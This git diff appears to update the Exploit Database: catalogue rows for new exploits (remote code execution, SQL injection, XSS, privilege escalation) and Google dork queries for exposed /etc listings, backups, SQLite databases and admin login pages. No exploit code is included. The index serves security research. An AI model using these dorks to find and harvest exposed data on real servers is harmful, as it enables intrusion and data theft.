b/files_exploits.csv index 3ff01acf6..7f9f52a8a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3592,6 +3592,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info 39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info 51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,, +51382,exploits/hardware/remote/51382.txt,"Franklin Fueling Systems TS-550 - Default Password",2023-04-20,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-20,2023-04-20,0,,,,,, 49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,, 32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,, 4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,, @@ -5605,6 +5606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,,2018-01-21,2018-01-21,0,CVE-2017-15374,,,,, 42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json,,2017-07-18,2017-07-18,1,CVE-2017-6182,,,,, 42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json,,2017-06-02,2017-08-18,0,CVE-2016-6566,,,,, +51379,exploits/json/webapps/51379.txt,"Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information",2023-04-20,"Rafael Cintra Lopes",webapps,json,,2023-04-20,2023-04-20,0,,,,,, 39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443,2016-02-23,2016-02-23,0,,,,,, 40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80,2016-06-28,2016-06-28,0,,,,,, 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,,2020-02-05,2020-02-05,0,CVE-2019-10716,,,,, @@ -7293,6 +7295,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,,2017-05-11,2019-07-26,1,CVE-2017-7308,Local,,,,https://github.com/xairy/kernel-exploits/blob/44fcbaafcb2988d3cbfee5d417b17368e15c78bf/CVE-2017-7308/poc.c 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",2021-11-23,"Ujas Dhami",local,linux,,2021-11-23,2021-11-23,0,CVE-2019-13272,,,,, 50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",2022-03-08,"Lance Biggerstaff",local,linux,,2022-03-08,2022-03-08,0,CVE-2022-0847,,,,, +51384,exploits/linux/local/51384.txt,"Linux Kernel 6.2 - Userspace Processes To Enable Mitigation",2023-04-20,nu11secur1ty,local,linux,,2023-04-20,2023-04-20,0,CVE-2023-1998,,,,, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,,2003-04-13,2016-02-25,1,OSVDB-4565;CVE-2003-0127,,,,http://www.exploit-db.comlinux-2.4.19.tar.gz, 4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux,,2007-12-17,2016-11-08,1,,,,,http://www.exploit-db.comlinux-2.6.11.1.tar.gz, 9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux,,2009-08-04,,1,CVE-2005-4605;OSVDB-22212,,,,, @@ -10993,6 +10996,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info +51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,, 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info 12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip, 36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz, @@ -14431,6 +14435,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info 28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info 28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info +51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29849,,,,, +51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29848,,,,, 51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip, 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,, @@ -15467,6 +15473,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info 15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip, 7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,, +51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,, 31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info 31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info 31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info @@ -18855,6 +18862,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php,,2006-03-19,,1,OSVDB-24018;CVE-2006-1348;OSVDB-24017;CVE-2006-1347;OSVDB-24016;CVE-2006-1346,,,,, 3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php,,2007-05-24,,1,OSVDB-36317;CVE-2007-2971,,,,, 11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php,,2010-02-01,,1,,,,,, +51381,exploits/php/webapps/51381.txt,"GDidees CMS 3.9.1 - Local File Disclosure",2023-04-20,"Hadi Mene",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-27179,,,,, 31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80,2014-02-27,2014-02-27,0,OSVDB-104011;OSVDB-104010;OSVDB-104009;OSVDB-104008;OSVDB-104007;CVE-2014-100031;CVE-2014-100030;CVE-2014-100029,,,,http://www.exploit-db.comgdl42.zip, 8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php,,2009-03-16,,1,OSVDB-52803;CVE-2009-0965,,,,, 3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php,,2007-03-19,2016-09-27,1,OSVDB-33776;CVE-2007-1577,,,,http://www.exploit-db.comgeblog-0.1.tar.gz, @@ -22297,6 +22305,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php,,2007-02-05,,1,OSVDB-34599;CVE-2007-0824,,,,, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,,2021-06-25,2021-06-25,1,,,,,http://www.exploit-db.comblog-1.3.zip, 5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php,,2008-06-19,2016-12-08,1,OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814,,,,, +51374,exploits/php/webapps/51374.py,"Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)",2023-04-20,"max / Zoltan Padanyi",webapps,php,,2023-04-20,2023-04-20,0,,,,,, 14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php,,2010-07-23,2010-07-23,0,,,,,, 1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,,2005-12-13,2017-11-22,1,OSVDB-21753;CVE-2005-4318,,,,, 6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php,,2008-10-20,,1,OSVDB-51863;CVE-2008-6078,,,,, @@ -27481,6 +27490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php,,2012-05-09,2015-05-29,1,CVE-2012-2274;OSVDB-81747,,,,,https://www.securityfocus.com/bid/53434/info 38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php,,2013-12-17,2015-12-06,1,OSVDB-101409,,,,,https://www.securityfocus.com/bid/64357/info 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,,2021-05-03,2021-05-03,0,CVE-2021-27973,,,,http://www.exploit-db.comPiwigo-11.3.0.zip, +51386,exploits/php/webapps/51386.txt,"Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, 34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php,,2009-10-28,2014-08-19,1,CVE-2009-4039;OSVDB-59955,,,,,https://www.securityfocus.com/bid/41897/info 10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php,,2009-12-12,,1,OSVDB-60977,,,,http://www.exploit-db.compiwigo-2.0.6.zip, 48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,,2020-09-16,2020-09-16,0,CVE-2020-9467,,,,, @@ -28028,6 +28038,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php,,2017-02-22,2017-02-22,0,,,,,http://www.exploit-db.comProjectSend-r754.zip,https://www.vulnerability-lab.com/get_content.php?id=2031 15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,, 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,, +51387,exploits/php/webapps/51387.txt,"ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, 45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip, 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,, 11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip, @@ -29045,6 +29056,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80,2019-01-18,2019-01-18,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comseotoasterv3.0.0.zip, 5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,, 18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip, +51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, +51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, @@ -34708,6 +34721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,, 51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,, +51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,, 51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,, 19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info 698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,, @@ -39153,6 +39167,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows,,2017-01-12,2017-01-12,0,,,,,http://www.exploit-db.comaScTimeTables.exe, 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,,2020-12-02,2020-12-02,0,,,,,, 40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,, +51380,exploits/windows/local/51380.txt,"AspEmail v5.6.0.2 - Local Privilege Escalation",2023-04-20,Zer0FauLT,local,windows,,2023-04-20,2023-04-20,0,,,,,, 31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows,,2014-02-06,2014-02-06,0,OSVDB-103048,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php 16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows,,2010-09-20,2011-03-10,1,CVE-2006-6665;OSVDB-32356,"Metasploit Framework (MSF)",,,, 2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,, @@ -39710,6 +39725,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,CVE-2009-0546;OSVDB-51753,"Metasploit Framework (MSF)",,,, 11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows,,2010-02-08,,1,OSVDB-51753;CVE-2009-0546,,,,http://www.exploit-db.comFeedDemonInstall.exe, 14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows,,2010-06-25,2010-11-12,1,,,,,,http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 +51375,exploits/windows/local/51375.txt,"File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control",2023-04-20,"Andrea Intilangelo",local,windows,,2023-04-20,2023-04-20,0,CVE-2023-26918,,,,, 50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,, 21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows,,2012-10-11,2012-10-11,0,OSVDB-86254,,,,,http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf 35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows,,2014-10-28,2014-10-28,0,CVE-2014-8347;OSVDB-113845,,,,, diff --git a/ghdb.xml b/ghdb.xml index 946f6bcdb..697dfd861 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -37610,6 +37610,21 @@ stag_1 2021-07-21 Osman Arif + + 8162 + https://www.exploit-db.com/ghdb/8162 + Files Containing Juicy Info + Index of" intext:"source_code.zip + # Google Dork: Index of" intext:"source_code.zip +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: PARAG BAGUL + Index of" intext:"source_code.zip + https://www.google.com/search?q=Index of" intext:"source_code.zip + + 2023-04-20 + PARAG BAGUL + 7638 https://www.exploit-db.com/ghdb/7638 @@ -38679,6 +38694,66 @@ misconfigured servers. 2023-04-06 Monirul Islam + + 8166 + https://www.exploit-db.com/ghdb/8166 + Files Containing Juicy Info + intext:"Index of" intext:"/etc" + # Google Dork: intext:"Index of" intext:"/etc" +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: PARAG BAGUL + intext:"Index of" intext:"/etc" + https://www.google.com/search?q=intext:"Index of" intext:"/etc" + + 2023-04-20 + PARAG BAGUL + + + 8163 + https://www.exploit-db.com/ghdb/8163 + Files Containing Juicy Info + intext:"Index of" intext:"backend/" + # Google Dork: intext:"Index of" intext:"backend/" +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: PARAG BAGUL + intext:"Index of" intext:"backend/" + https://www.google.com/search?q=intext:"Index of" intext:"backend/" + + 2023-04-20 + PARAG BAGUL + + + 8161 + https://www.exploit-db.com/ghdb/8161 + Files Containing Juicy Info + intext:"Index of" intext:"backup.tar" + # Google Dork: intext:"Index of" intext:"backup.tar" +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: PARAG BAGUL + intext:"Index of" intext:"backup.tar" + https://www.google.com/search?q=intext:"Index of" intext:"backup.tar" + + 2023-04-20 + PARAG BAGUL + + + 8165 + https://www.exploit-db.com/ghdb/8165 + Files Containing Juicy Info + intext:"Index of" intext:"bitbucket-pipelines.yml" + # Google Dork: intext:"Index of" intext:"bitbucket-pipelines.yml" +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: PARAG BAGUL + intext:"Index of" intext:"bitbucket-pipelines.yml" + https://www.google.com/search?q=intext:"Index of" intext:"bitbucket-pipelines.yml" + + 2023-04-20 + PARAG BAGUL + 7717 https://www.exploit-db.com/ghdb/7717 @@ -38694,6 +38769,21 @@ misconfigured servers. 2021-11-09 Parth Surati + + 8164 + https://www.exploit-db.com/ghdb/8164 + Files Containing Juicy Info + intext:"Index of" intext:"plugin/" + # Google Dork: intext:"Index of" intext:"plugin/" +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: PARAG BAGUL + intext:"Index of" intext:"plugin/" + https://www.google.com/search?q=intext:"Index of" intext:"plugin/" + + 2023-04-20 + PARAG BAGUL + 7683 https://www.exploit-db.com/ghdb/7683 @@ -47987,6 +48077,21 @@ Author: Abhinav Porwal 2021-10-27 MD. Rimel + + 8167 + https://www.exploit-db.com/ghdb/8167 + Files Containing Juicy Info + intitle:index of db.sqlite3 + # Google Dork: intitle:index of db.sqlite3 +# Files Containing Juicy Info +# Date:20/04/2023 +# Exploit Author: Shebu + Re: Thank you for your submission! Re: intitle:index of db.sqlite3 + https://www.google.com/search?q=Re: Thank you for your submission! Re: intitle:index of db.sqlite3 + + 2023-04-20 + Shebu + 7368 https://www.exploit-db.com/ghdb/7368 @@ -78027,6 +78132,21 @@ https://ch.linkedin.com/in/schmidbruno 2021-11-15 Arindam Saha + + 8168 + https://www.exploit-db.com/ghdb/8168 + Pages Containing Login Portals + inurl: "/admin" intitle:"Admin Login" + # Google Dork: inurl: "/admin" intitle:"Admin Login" +# Pages Containing Login Portals +# Date:20/04/2023 +# Exploit Author: Bhavin Amesara + inurl: "/admin" intitle:"Admin Login" + https://www.google.com/search?q=inurl: "/admin" intitle:"Admin Login" + + 2023-04-20 + Bhavin Amesara + 7387 https://www.exploit-db.com/ghdb/7387